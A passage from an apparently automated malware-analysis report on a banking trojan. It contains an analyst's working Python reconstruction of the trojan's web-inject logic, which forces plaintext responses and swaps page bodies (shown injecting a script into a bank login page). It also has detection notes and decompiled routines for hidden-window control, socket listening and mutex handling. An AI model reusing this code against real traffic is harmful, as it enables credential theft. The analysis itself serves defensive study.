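code; header semantics and framing rules are inferred from the strings."""

CRLF = b"\r\n"
HEADER_END = b"\r\n\r\n"


def split_message(raw: bytes):
    """Split an HTTP message into (start line, [(name, value), ...], body)."""
    head, sep, body = raw.partition(HEADER_END)
    if not sep:
        raise ValueError("incomplete header block")
    lines = head.split(CRLF)
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def join_message(start: bytes, headers, body: bytes) -> bytes:
    """Serialize a start line, header list and body back into wire form."""
    out = [start] + [n + b": " + v for n, v in headers]
    return CRLF.join(out) + HEADER_END + body


def normalize_request(raw: bytes) -> bytes:
    """Force a full, uncompressed, unconditional response from the server:
    replace Accept-Encoding with 'identity' and drop TE / If-Modified-Since.
    Names compare case-insensitively (the listing calls StrCmpNIA)."""
    start, headers, body = split_message(raw)
    drop = {b"accept-encoding", b"te", b"if-modified-since"}
    kept = [(n, v) for n, v in headers if n.lower() not in drop]
    kept.append((b"Accept-Encoding", b"identity"))
    return join_message(start, kept, body)


def reframe_response(raw: bytes, new_body: bytes) -> bytes:
    """Swap the body of a response and repair its framing.
    Content-Length responses get a recomputed length; chunked responses are
    re-emitted as a single '%x\\r\\n' chunk followed by the '0' terminator,
    matching the two format strings in E004132F8."""
    start, headers, _old_body = split_message(raw)
    chunked = any(
        n.lower() == b"transfer-encoding" and b"chunked" in v.lower()
        for n, v in headers
    )
    kept = [(n, v) for n, v in headers if n.lower() != b"content-length"]
    if chunked:
        framed = b"%x\r\n" % len(new_body) + new_body + b"\r\n0\r\n\r\n"
        return join_message(start, kept, framed)
    kept.append((b"Content-Length", b"%d" % len(new_body)))
    return join_message(start, kept, new_body)


# Constructed sample traffic (not captured from the sample).
SAMPLE_REQUEST = (
    b"GET /login HTTP/1.1\r\nHost: bank.example\r\n"
    b"Accept-Encoding: gzip, deflate\r\nTE: trailers\r\n"
    b"If-Modified-Since: Mon, 01 Jan 2018 00:00:00 GMT\r\n\r\n"
)
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
    b"Content-Length: 13\r\n\r\n<html></html>"
)
SAMPLE_CHUNKED = (
    b"HTTP/1.1 200 OK\r\nTransfer-Encoding: chunked\r\n\r\n"
    b"5\r\nhello\r\n0\r\n\r\n"
)

if __name__ == "__main__":
    print(normalize_request(SAMPLE_REQUEST).decode())
    print(reframe_response(SAMPLE_RESPONSE, b"<html><script>x</script></html>").decode())
    print(reframe_response(SAMPLE_CHUNKED, b"hello world!").decode())
```

    The detection angle follows directly: a client that always sends Accept-Encoding: identity and never sends TE or If-Modified-Since, while the browser process is known to emit them, is a proxy-side indicator that the socket layer has been hooked, and a response body whose length no longer matches the server's original Content-Length is the corresponding server-side one.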
    C-Code - Quality: 100%
    			E0041D350(void* __eax, signed int __ecx, void* __edx, RECT* __edi, long _a4, intOrPtr _a8) {
    				char _v5;
    				long _v12;
    				signed char _v16;
    				struct tagRECT _v32;
    				char _v140;
    				void* __ebx;
    				void* __esi;
    				signed char _t47;
    				intOrPtr _t52;
    				void* _t85;
    				RECT* _t89;
    
    				_t89 = __edi;
    				_t86 = __ecx;
    				_t85 = __eax;
    				_t47 = E00407C72(_a4) & 0x0000ffff;
    				_v16 = _t47;
    				if((_t47 & 0x00000001) != 0) {
    					L16:
    					return 1;
    				}
    				if(GetWindowThreadProcessId(_a4,  &_v12) == 0) {
    					_v5 = 0;
    				} else {
    					_t7 = _t85 + 0x50; // 0x50
    					_t9 = _t85 + 0x3c; // 0x3c
    					_t86 =  &_v140;
    					E0041AA01( &_v140, _t9, _v12, _t7, 2);
    					_v5 = E00419B8B( &_v140);
    				}
    				if(_v5 == 0 || (_v16 & 0x00000010) != 0) {
    					L8:
    					if(E0041D1EE(_t85, _t86) == 0) {
    						L14:
    						_t52 = _a8;
    						if(( *(_t52 + 0x24) & 0x40000000) == 0) {
    							IntersectRect( &_v32, _t52 + 4, _t89);
    							FillRect( *(_t85 + 0x154),  &_v32, 6);
    							DrawEdge( *(_t85 + 0x154),  &_v32, 0xa, 0xf);
    						}
    						goto L16;
    					}
    					E004163E4( *((intOrPtr*)(_t85 + 0x10)) + 0x114, _t89, 0x10);
    					ResetEvent( *(_t85 + 0xc));
    					if(PostThreadMessageW( *(_t85 + 0x188),  *(_t85 + 8), 0xfffffffc, _a4) == 0) {
    						goto L14;
    					}
    					if(WaitForSingleObject( *(_t85 + 0xc), 0x3e8) != 0) {
    						_t35 = _t85 + 0x17c; // 0x17c
    						TerminateProcess( *_t35, 0);
    						E00417DB7(_t35);
    						goto L14;
    					}
    					if( *((char*)( *((intOrPtr*)(_t85 + 0x10)) + 0x124)) != 1) {
    						goto L14;
    					}
    					return _v5;
    				} else {
    					ResetEvent( *(_t85 + 0xc));
    					_t86 = _t89->left & 0x0000ffff;
    					if(PostMessageW(_a4,  *(_t85 + 8), (_t89->top & 0x0000ffff) << 0x00000010 | _t89->left & 0x0000ffff, (_t89->bottom & 0x0000ffff) << 0x00000010 | _t89->right & 0x0000ffff) == 0 || WaitForSingleObject( *(_t85 + 0xc), 0x64) != 0) {
    						goto L8;
    					} else {
    						goto L16;
    					}
    				}
    			}
    Instruction addresses (one per decompiled line above, column separated from the code by extraction): 0x0041d350 to 0x0041d4b9

    APIs
      • Part of subcall function 00407C72: GetClassNameW.USER32 ref: 00407C8D
    • GetWindowThreadProcessId.USER32(?,?), ref: 0041D37A
    • ResetEvent.KERNEL32(?), ref: 0041D3C9
    • PostMessageW.USER32(?,?,?,?), ref: 0041D3EC
    • WaitForSingleObject.KERNEL32(?,00000064), ref: 0041D3FB
    • ResetEvent.KERNEL32(?,?,?,00000010), ref: 0041D426
    • PostThreadMessageW.USER32 ref: 0041D436
    • WaitForSingleObject.KERNEL32(?,000003E8,?,00000010), ref: 0041D448
      • Part of subcall function 0041AA01: StringFromGUID2.OLE32(00000000,?,00000028,0040EDB5,?,00000010,00000000,77E49EB0), ref: 0041AAA2
      • Part of subcall function 00419B8B: OpenMutexW.KERNEL32(00100000,00000000,00000000,0040F741,?,19367401,?,00000001,8889347B,00000002), ref: 00419B96
      • Part of subcall function 00419B8B: CloseHandle.KERNEL32(00000000), ref: 00419BA1
    • TerminateProcess.KERNEL32(0000017C,00000000,?,00000010), ref: 0041D46D
      • Part of subcall function 00417DB7: CloseHandle.KERNEL32(00000000,74B5F560,00408019,00000000,004228E0,00000000,0040814E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00417DC6
      • Part of subcall function 00417DB7: CloseHandle.KERNEL32(00000000,74B5F560,00408019,00000000,004228E0,00000000,0040814E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00417DCF
    • IntersectRect.USER32 ref: 0041D48D
    • FillRect.USER32 ref: 0041D49F
    • DrawEdge.USER32(?,?,0000000A,0000000F), ref: 0041D4B3
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: CloseHandle$EventMessageObjectPostProcessRectResetSingleThreadWait$ClassDrawEdgeFillFromIntersectMutexNameOpenStringTerminateWindow
    • String ID:
    • API String ID: 2453266691-0
    • Opcode ID: 75886548675cbbb97cf89533a43dc2bf99acfee0b3ca964ee47820301d76ed39
    • Instruction ID: afc57b47a3688a03d04002354c68740deab08ca308a231b8d10406ea7fb6115a
    • Opcode Fuzzy Hash: 75886548675cbbb97cf89533a43dc2bf99acfee0b3ca964ee47820301d76ed39
    • Instruction Fuzzy Hash: D2418170900208BBEF119F60CD85FEA7B78BF04304F0480A6FD44EA1A2D779E995DB68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 31%
    			E0040D31F(void* __eax, signed int _a4, signed int _a8, signed int _a12, signed short _a16) {
    				struct HWND__* _v8;
    				char _v12;
    				struct HWND__* _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				signed char _v32;
    				intOrPtr _v68;
    				struct tagWINDOWINFO _v92;
    				void* __ebx;
    				void* __esi;
    				intOrPtr _t107;
    				struct HWND__* _t108;
    				int _t113;
    				int _t114;
    				signed char _t143;
    				struct HWND__* _t144;
    				long _t147;
    				struct HWND__* _t170;
    				long _t171;
    				void* _t174;
    
    				_t174 = __eax;
    				_t107 =  *((intOrPtr*)(__eax + 0x10));
    				_v16 = 0;
    				if( *((intOrPtr*)(_t107 + 0x110)) == 0) {
    					_t108 =  *((intOrPtr*)(_t107 + 0x108));
    					_v16 = _t108;
    					if(_t108 != 0) {
    						_v32 = E0040801F(0, __eax, 0) & 0x0000ffff;
    					} else {
    						_v32 = 0;
    					}
    				} else {
    					if((_a4 & 0x00000001) != 0) {
    						E0040CE91(_a12, _a8, __eax);
    						_a4 = _a4 & 0xfffffffe;
    					}
    					if((_a4 & 0x00000004) != 0) {
    						E0040CE22(0, _t174, 0, 0, 1);
    					}
    				}
    				_t143 = _a4;
    				 *( *(_t174 + 0x10) + 0x100) = _a8;
    				_t113 =  *(_t174 + 0x10);
    				 *(_t113 + 0x104) = _a12;
    				if(_t143 == 0) {
    					L69:
    					return _t113;
    				}
    				_v20 = _t143;
    				_t26 =  &_v20;
    				 *_t26 = _v20 & 0x00000002;
    				if( *_t26 == 0) {
    					if((_t143 & 0x00000004) == 0) {
    						goto L14;
    					} else {
    						_push(0);
    						goto L13;
    					}
    				} else {
    					_push(1);
    					L13:
    					E0040801F(1, _t174);
    					L14:
    					_v24 = _t143;
    					_t31 =  &_v24;
    					 *_t31 = _v24 & 0x00000020;
    					if( *_t31 == 0) {
    						if((_t143 & 0x00000040) == 0) {
    							L19:
    							_v28 = _t143;
    							_t36 =  &_v28;
    							 *_t36 = _v28 & 0x00000008;
    							if( *_t36 == 0) {
    								if((_t143 & 0x00000010) == 0) {
    									L24:
    									_t114 =  *(_t174 + 0x10);
    									_push( *((intOrPtr*)(_t114 + 0x104)));
    									_push( *((intOrPtr*)(_t114 + 0x100)));
    									0xc00000 = 0x64;
    									_t170 = E0041AADD(0xc00000,  &_v12);
    									_t113 = _v12 + 0xfffffff6;
    									_v8 = _t170;
    									if(_t113 <= 7) {
    										_t113 = GetWindowLongW(_t170, 0xfffffff0);
    										if((_t113 & 0x40000000) != 0 && (_t113 & 0x00c00000) != 0xc00000 && (_t113 & 0x80040000) == 0) {
    											_t113 = GetParent(_t170);
    											if(_t113 != 0) {
    												_v8 = _t113;
    												_t170 = _t113;
    											}
    										}
    									}
    									if(_t170 == 0) {
    										L35:
    										_t144 = _v16;
    										if(_t144 != 0) {
    											_t113 = IsWindow(_t144);
    											if(_t113 == 0 || _t170 != 0 && _t144 != _t170 && (_v32 & 0x00000007) == 0) {
    												if(_a4 != 0x8001) {
    													_t113 = E0040CE22(0, _t174, 0, 0, 1);
    												}
    											} else {
    												_v8 = _t144;
    												_v12 = 1;
    												_t170 = _t144;
    											}
    										}
    										goto L43;
    									} else {
    										_t113 = E00407C72(_t170);
    										if((_t113 & 0x00000040) == 0) {
    											goto L35;
    										}
    										if(_t170 != _v16) {
    											_t113 = E0040CE22(_t170, _t174, GetWindowThreadProcessId(_t170, 0), 0, 1);
    										}
    										_v12 = 1;
    										L43:
    										if(_t170 == 0) {
    											goto L69;
    										}
    										_v92.cbSize = 0x3c;
    										_t113 = GetWindowInfo(_t170,  &_v92);
    										if(_t113 == 0) {
    											goto L69;
    										}
    										_t113 = _a8 & 0x0000ffff;
    										_t147 = (_a12 & 0x0000ffff) << 0x00000010 | _t113;
    										if(_v12 != 1) {
    											_t171 = _a4;
    										} else {
    											_t113 = E00407C72(_t170);
    											if((_t113 & 0x00000020) == 0) {
    												_t113 = _a8 - _v92.rcClient & 0x0000ffff;
    												_t171 = (_a12 - _v68 & 0x0000ffff) << 0x00000010 | _t113;
    											} else {
    												_t171 = _t147;
    											}
    										}
    										if(_v20 == 0) {
    											if((_a4 & 0x00000004) == 0) {
    												goto L55;
    											}
    											_push(_t147);
    											_push(_t171);
    											_push(0xa2);
    											_push(0x202);
    											goto L54;
    										} else {
    											_push(_t147);
    											_push(_t171);
    											_push(0xa1);
    											_push(0x201);
    											L54:
    											_push(_v12);
    											_push( &_v92);
    											_push(_v8);
    											_t113 = E0040D091(_t174, 0xc00000);
    											L55:
    											if(_v24 == 0) {
    												if((_a4 & 0x00000040) == 0) {
    													L60:
    													if(_v28 == 0) {
    														if((_a4 & 0x00000010) == 0) {
    															L65:
    															if((_a4 & 0x00000001) != 0) {
    																_t113 = E0040D091(_t174, 0xc00000, _v8,  &_v92, _v12, 0x200, 0xa0, _t171, _t147);
    															}
    															if((_a4 & 0x00000800) != 0) {
    																_t113 = PostMessageW(_v8, 0x20a, (_a16 & 0x0000ffff) << 0x00000010 | E0040801F(0, _t174, 0) & 0x0000ffff, _t147);
    															}
    															goto L69;
    														}
    														_push(_t147);
    														_push(_t171);
    														_push(0xa5);
    														_push(0x205);
    														L64:
    														_push(_v12);
    														_push( &_v92);
    														_push(_v8);
    														_t113 = E0040D091(_t174, 0xc00000);
    														goto L65;
    													}
    													_push(_t147);
    													_push(_t171);
    													_push(0xa4);
    													_push(0x204);
    													goto L64;
    												}
    												_push(_t147);
    												_push(_t171);
    												_push(0xa8);
    												_push(0x208);
    												L59:
    												_push(_v12);
    												_push( &_v92);
    												_push(_v8);
    												_t113 = E0040D091(_t174, 0xc00000);
    												goto L60;
    											}
    											_push(_t147);
    											_push(_t171);
    											_push(0xa7);
    											_push(0x207);
    											goto L59;
    										}
    									}
    								}
    								_push(0);
    								L23:
    								E0040801F(2, _t174);
    								goto L24;
    							}
    							_push(1);
    							goto L23;
    						}
    						_push(0);
    						L18:
    						E0040801F(4, _t174);
    						goto L19;
    					}
    					_push(1);
    					goto L18;
    				}
    			}

    APIs
    • GetWindowLongW.USER32(00000000,000000F0), ref: 0040D42B
    • GetParent.USER32(00000000), ref: 0040D44D
    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0040D472
    • IsWindow.USER32(?), ref: 0040D495
      • Part of subcall function 0040CE91: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040CEA5
      • Part of subcall function 0040CE91: ReleaseMutex.KERNEL32(?), ref: 0040CEC4
      • Part of subcall function 0040CE91: GetWindowRect.USER32 ref: 0040CED1
      • Part of subcall function 0040CE91: IsRectEmpty.USER32(?), ref: 0040CF55
      • Part of subcall function 0040CE91: GetWindowLongW.USER32(?,000000F0), ref: 0040CF64
      • Part of subcall function 0040CE91: GetParent.USER32(?), ref: 0040CF7A
      • Part of subcall function 0040CE91: MapWindowPoints.USER32 ref: 0040CF83
      • Part of subcall function 0040CE91: SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 0040CFA7
    • GetWindowInfo.USER32 ref: 0040D4E5
    • PostMessageW.USER32(?,0000020A,00000000,00000002), ref: 0040D622
      • Part of subcall function 0040CE22: WaitForSingleObject.KERNEL32(?,000000FF,7743A660,0040D25B,00000000), ref: 0040CE28
      • Part of subcall function 0040CE22: ReleaseMutex.KERNEL32(?), ref: 0040CE5C
      • Part of subcall function 0040CE22: IsWindow.USER32(?), ref: 0040CE63
      • Part of subcall function 0040CE22: PostMessageW.USER32(?,00000215,00000000,?), ref: 0040CE7D
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Window$LongMessageMutexObjectParentPostRectReleaseSingleWait$EmptyInfoPointsProcessThread
    • String ID: $<$@
    • API String ID: 3705211839-2197183666
    • Opcode ID: 8716e975723d80b5c29e6d0ac0f0769a9059d89c8116fa46040e2e6edf10abba
    • Instruction ID: 1ef8d9956b424b20c8a87b1457cc90fb2a58313426d9740db7aa97ef6c1182e1
    • Opcode Fuzzy Hash: 8716e975723d80b5c29e6d0ac0f0769a9059d89c8116fa46040e2e6edf10abba
    • Instruction Fuzzy Hash: EF91A170E00309BAEB219F94CC85BBF7BB5AB41708F14403AFD41762D1C7B89989D759
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E00413CAD(void* __ecx, void* __eflags) {
    				intOrPtr _v74;
    				signed int _v78;
    				char _v124;
    				char _v128;
    				long _v140;
    				void* _v144;
    				intOrPtr _v148;
    				void* _v152;
    				void* _v156;
    				void* _v160;
    				char _v164;
    				void* _v168;
    				signed int _v172;
    				long _v184;
    				void* __esi;
    				void* _t47;
    				long _t48;
    				void* _t49;
    				long _t56;
    				long _t57;
    				long _t59;
    				intOrPtr _t64;
    				long _t65;
    				long _t69;
    				void* _t72;
    				long _t77;
    				signed int _t83;
    				intOrPtr* _t85;
    				signed int _t94;
    				long _t97;
    				signed int _t98;
    				void* _t100;
    
    				_t100 = (_t98 & 0xfffffff8) - 0xac;
    				_t83 = 2;
    				_t47 = E0040EDBB(__ecx, __eflags, 0x743c152e, _t83);
    				_v156 = _t47;
    				if(_t47 != 0) {
    					_t48 = E0040EEE1();
    					__eflags = _t48;
    					if(_t48 == 0) {
    						L26:
    						E00419B7B(_v148);
    						_t49 = 0;
    						__eflags = 0;
    						L27:
    						return _t49;
    					}
    					E00413E8F(__ecx,  &_v124);
    					_t87 = _v78;
    					_t94 = E00413B58( &_v160, _v78,  &_v168) & 0x0000ffff;
    					__eflags = _t94;
    					if(_t94 != 0) {
    						L7:
    						__eflags = _t94 - _v74;
    						if(_t94 != _v74) {
    							E00413F4A( &_v124);
    							_v78 = _t94;
    							E00413FA2( &_v128);
    						}
    						_v144 =  *0x42305c;
    						_t56 = _v152;
    						_v172 = 1;
    						__eflags = _t56;
    						if(_t56 != 0) {
    							_v140 = _t56;
    							_v172 = _t83;
    						}
    						_t57 = _v160;
    						__eflags = _t57;
    						if(_t57 != 0) {
    							_t87 = _v172;
    							_t20 =  &_v172;
    							 *_t20 = _v172 + 1;
    							__eflags =  *_t20;
    							 *(_t100 + 0x2c + _v172 * 4) = _t57;
    						}
    						_t59 = WaitForMultipleObjects(_v172,  &_v144, 0, 0xffffffff);
    						__eflags = _t59;
    						if(_t59 <= 0) {
    							L25:
    							E0041974B(_t59, _v156);
    							E0041974B(CloseHandle(_v152), _v164);
    							CloseHandle(_v160);
    							goto L26;
    						} else {
    							_t85 = __imp__#1;
    							while(1) {
    								__eflags = _t59 - _v172;
    								if(_t59 >= _v172) {
    									goto L25;
    								}
    								_t64 =  *((intOrPtr*)(_t100 + 0x2c + _t59 * 4));
    								__eflags = _t64 - _v152;
    								if(_t64 != _v152) {
    									__eflags = _t64 - _v160;
    									if(_t64 != _v160) {
    										while(1) {
    											L23:
    											_t39 =  &_v168; // 0x413be0
    											_t65 =  *_t85( *_t39, 0, 0);
    											_t97 = _t65;
    											__eflags = _t97 - 0xffffffff;
    											if(_t97 == 0xffffffff) {
    												break;
    											}
    											__imp__WSAEventSelect(_t97, 0, 0);
    											_v156 = 0;
    											__imp__WSAIoctl(_t97, 0x8004667e,  &_v156, 4, 0, 0,  &_v152, 0, 0);
    											E004197A3(_t87, _t97);
    											_t69 = E00417DDD(0x20000, E00413BE0, _t97);
    											__eflags = _t69;
    											if(_t69 == 0) {
    												E0041974B(_t69, _t97);
    											}
    										}
    										_t59 = WaitForMultipleObjects(_v184,  &_v156, 0, _t65);
    										__eflags = _t59;
    										if(_t59 > 0) {
    											continue;
    										}
    										goto L25;
    									}
    									_t72 = _v164;
    									L20:
    									_v168 = _t72;
    									goto L23;
    								}
    								_t72 = _v156;
    								goto L20;
    							}
    							goto L25;
    						}
    					} else {
    						goto L4;
    					}
    					while(1) {
    						L4:
    						_t77 = WaitForSingleObject( *0x42305c, 0x3e8);
    						__eflags = _t77 - 0x102;
    						if(_t77 != 0x102) {
    							break;
    						}
    						_t87 = _v74;
    						_t94 = E00413B58( &_v156, _v74,  &_v164) & 0x0000ffff;
    						__eflags = _t94;
    						if(_t94 == 0) {
    							continue;
    						}
    						break;
    					}
    					__eflags = _t94;
    					if(_t94 == 0) {
    						goto L26;
    					}
    					goto L7;
    				}
    				_t49 = 1;
    				goto L27;
    			}

    APIs
      • Part of subcall function 0040EDBB: CreateMutexW.KERNEL32(00422BD0,00000000,?,?,?,?,?), ref: 0040EDDC
    • WaitForSingleObject.KERNEL32(000003E8,?,?,743C152E,00000002), ref: 00413D18
    • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF,?,?,743C152E), ref: 00413DA9
    • accept.WS2_32(?,00000000,00000000), ref: 00413E35
    • WaitForMultipleObjects.KERNEL32(?,?,00000000,00000000), ref: 00413E49
    • CloseHandle.KERNEL32(?), ref: 00413E6A
    • CloseHandle.KERNEL32(?), ref: 00413E79
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Wait$CloseHandleMultipleObjects$CreateMutexObjectSingleaccept
    • String ID: ;A
    • API String ID: 38240579-3646425762
    • Opcode ID: 9f3073dc993a35bcca8bf40d70837224a6f02cc8c0a085c08d24897742cf9eb3
    • Instruction ID: b510ce600d3a98f345b50b4e7db6aee6c888548736ec519748eafceba13fb2d4
    • Opcode Fuzzy Hash: 9f3073dc993a35bcca8bf40d70837224a6f02cc8c0a085c08d24897742cf9eb3
    • Instruction Fuzzy Hash: 6C515D71108340ABC720EF66D844CAFB7E8EB85715F50092EF595A32A0D734DE85CB5A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040E85A(void* __ecx, void* __edx, void* __eflags) {
    				long _v8;
    				signed int _v12;
    				void _v532;
    				void* __edi;
    				unsigned int _t22;
    				void* _t30;
    				void* _t39;
    				void* _t41;
    				WCHAR* _t42;
    				void* _t43;
    				void* _t46;
    
    				_t41 = __edx;
    				_t39 = __ecx;
    				InitializeCriticalSection(0x4228a8);
    				 *0x42289c = 0;
    				 *0x4228a4 = 0;
    				 *0x4228a0 = 0;
    				 *0x422834 = 0;
    				 *0x4230bc = 0;
    				 *0x42313c = 0;
    				 *0x423140 = 0;
    				InitializeCriticalSection(0x423124);
    				_t42 =  &_v532;
    				E0040F0DC(_t39, _t42, 0);
    				_v12 = _v12 | 0xffffffff;
    				_v8 = 0x1fe;
    				_t43 = CreateFileW(_t42, 0x80000000, 1, 0, 3, 0, 0);
    				if(_t43 != 0xffffffff) {
    					if(ReadFile(_t43,  &_v532, _v8,  &_v8, 0) != 0) {
    						_v12 = _v8;
    					}
    					CloseHandle(_t43);
    				}
    				_t22 = _v12;
    				if(_t22 == 0xffffffff || (_t22 & 0x00000001) != 0) {
    					_t22 = 0;
    				}
    				 *((short*)(_t46 + (_t22 >> 1) * 2 - 0x210)) = 0;
    				E00406DDD( &_v532);
    				E00412A50( &_v532);
    				 *0x422a6c = 0;
    				 *0x422a88 = 0;
    				InitializeCriticalSection("hp*B");
    				E004080CB(_t41);
    				if(GetModuleHandleW(L"nspr4.dll") == 0) {
    					_t30 = 0;
    				} else {
    					_t30 = E004159B8(0, _t41, _t29);
    				}
    				if(_t30 != 0) {
    					 *0x423144 =  *0x423144 | 0x00000001;
    				}
    				E00415781();
    				return 1;
    			}

    APIs
    • InitializeCriticalSection.KERNEL32(004228A8,00000000,74B04EE0,00000000), ref: 0040E871
    • InitializeCriticalSection.KERNEL32(00423124), ref: 0040E8A6
      • Part of subcall function 0040F0DC: PathRenameExtensionW.SHLWAPI(?,.dat,?,00422BF8,00000000,00000032,?,77E49EB0,00000000), ref: 0040F155
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 0040E8CE
    • ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 0040E8EB
    • CloseHandle.KERNEL32(00000000), ref: 0040E8FC
    • InitializeCriticalSection.KERNEL32(hp*B), ref: 0040E943
    • GetModuleHandleW.KERNEL32(nspr4.dll), ref: 0040E94F
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: CriticalInitializeSection$FileHandle$CloseCreateExtensionModulePathReadRename
    • String ID: hp*B$nspr4.dll
    • API String ID: 1155594396-612219018
    • Opcode ID: d2c5eadc403bc3566a4fa4ca0947c6ba4ca8daed34fff53abf9418bc5f06d4f6
    • Instruction ID: 421def61052ff6ad850046fd3176ab1d68e5e177642732c6ea1f52f3e17782f6
    • Opcode Fuzzy Hash: d2c5eadc403bc3566a4fa4ca0947c6ba4ca8daed34fff53abf9418bc5f06d4f6
    • Instruction Fuzzy Hash: 34318871640218EFC720AF699DC5AAA77B8AB44314F50097BE515F32E0D7784E568B18
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E0040DE3F(intOrPtr __ecx, void* __edx, void* __eflags) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v16;
    				void* _v20;
    				void* _v24;
    				intOrPtr _v28;
    				char _v92;
    				void* __ebx;
    				void* __edi;
    				intOrPtr _t22;
    				void* _t25;
    				long _t27;
    				void* _t28;
    				long _t29;
    				void* _t33;
    				void* _t39;
    				void* _t41;
    				void* _t44;
    				long _t49;
    				void* _t50;
    				void* _t57;
    				void* _t62;
    				void* _t69;
    				void* _t73;
    				WCHAR* _t77;
    				void* _t78;
    				void* _t80;
    				void* _t82;
    
    				_t73 = __edx;
    				_t70 = __ecx;
    				_t22 = E0040EDBB(__ecx, __eflags, 0x743c1521, 2);
    				_v28 = _t22;
    				if(_t22 != 0) {
    					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
    					_t25 = E0040EEE1();
    					__eflags = _t25;
    					if(_t25 == 0) {
    						L24:
    						E00419B7B(_v28);
    						__eflags = 0;
    						return 0;
    					}
    					_t27 = WaitForSingleObject( *0x42305c, 0xea60);
    					__eflags = _t27 - 0x102;
    					if(_t27 != 0x102) {
    						goto L24;
    					}
    					do {
    						_t28 = E00405A4B(_t70);
    						_v24 = _t28;
    						__eflags = _t28;
    						if(__eflags == 0) {
    							goto L22;
    						}
    						_t80 = E0041BF16( &_v16, _t73, __eflags, _t28, 2, 0x20000000);
    						_v20 = _t80;
    						__eflags = _t80;
    						if(__eflags == 0) {
    							L21:
    							E004163A8(_v20);
    							E004163A8(_v24);
    							goto L22;
    						}
    						_t70 = _v16;
    						_t33 = E0040D8D4(_v16, __eflags, _t80);
    						__eflags = _t33;
    						if(_t33 == 0) {
    							goto L21;
    						} else {
    							goto L8;
    						}
    						do {
    							L8:
    							_v8 = E00417278(_t80, 1);
    							_v12 = E00417278(_t80, 2);
    							_t39 = E00417757(_t80, E00416EE5(_t80));
    							_t72 = _v8;
    							_t41 = E00417757(_t72, E00416EE5(_v8));
    							_t70 = _v12;
    							_push(E00417757(_t70, E00416EE5(_v12)));
    							_push(_t41);
    							_push(_t39);
    							_push(L"Global\\%08X%08X%08X");
    							_t73 = 0x20;
    							_t77 =  &_v92;
    							_t44 = E0041709B(_t43, _t73, _t77);
    							_t82 = _t82 + 0x10;
    							__eflags = _t44 - 0x1f;
    							if(_t44 != 0x1f) {
    								goto L20;
    							}
    							_t69 = CreateMutexW(0x422bd0, 1, _t77);
    							__eflags = _t69;
    							if(_t69 == 0) {
    								goto L20;
    							}
    							_t49 = GetLastError();
    							__eflags = _t49 - 0xb7;
    							if(_t49 == 0xb7) {
    								CloseHandle(_t69);
    								_t69 = 0;
    								__eflags = 0;
    							}
    							__eflags = _t69;
    							if(_t69 != 0) {
    								_t50 = 0x10;
    								_t78 = E00416378(_t50);
    								__eflags = _t78;
    								if(_t78 == 0) {
    									L19:
    									E00419B7B(_t69);
    									goto L20;
    								}
    								 *_t78 = E00416806(_t51 | 0xffffffff, _t80);
    								 *(_t78 + 4) = E00416806(_t53 | 0xffffffff, _v8);
    								_t57 = E00416806(_t55 | 0xffffffff, _v12);
    								__eflags =  *_t78;
    								 *(_t78 + 8) = _t57;
    								 *(_t78 + 0xc) = _t69;
    								if( *_t78 == 0) {
    									L18:
    									E004163A8( *_t78);
    									E004163A8( *(_t78 + 4));
    									E004163A8( *(_t78 + 8));
    									E004163A8(_t78);
    									goto L19;
    								}
    								__eflags =  *(_t78 + 4);
    								if( *(_t78 + 4) == 0) {
    									goto L18;
    								}
    								__eflags = _t57;
    								if(_t57 == 0) {
    									goto L18;
    								}
    								_t62 = E00417DDD(0x80000, E0040DB94, _t78);
    								__eflags = _t62;
    								if(_t62 != 0) {
    									goto L20;
    								}
    								goto L18;
    							}
    							L20:
    							_t80 = E00417278(_t80, 3);
    							__eflags = _t80;
    						} while (_t80 != 0);
    						goto L21;
    						L22:
    						_t29 = WaitForSingleObject( *0x42305c, 0xea60);
    						__eflags = _t29 - 0x102;
    					} while (_t29 == 0x102);
    					goto L24;
    				}
    				return _t22 + 1;
    			}

    APIs
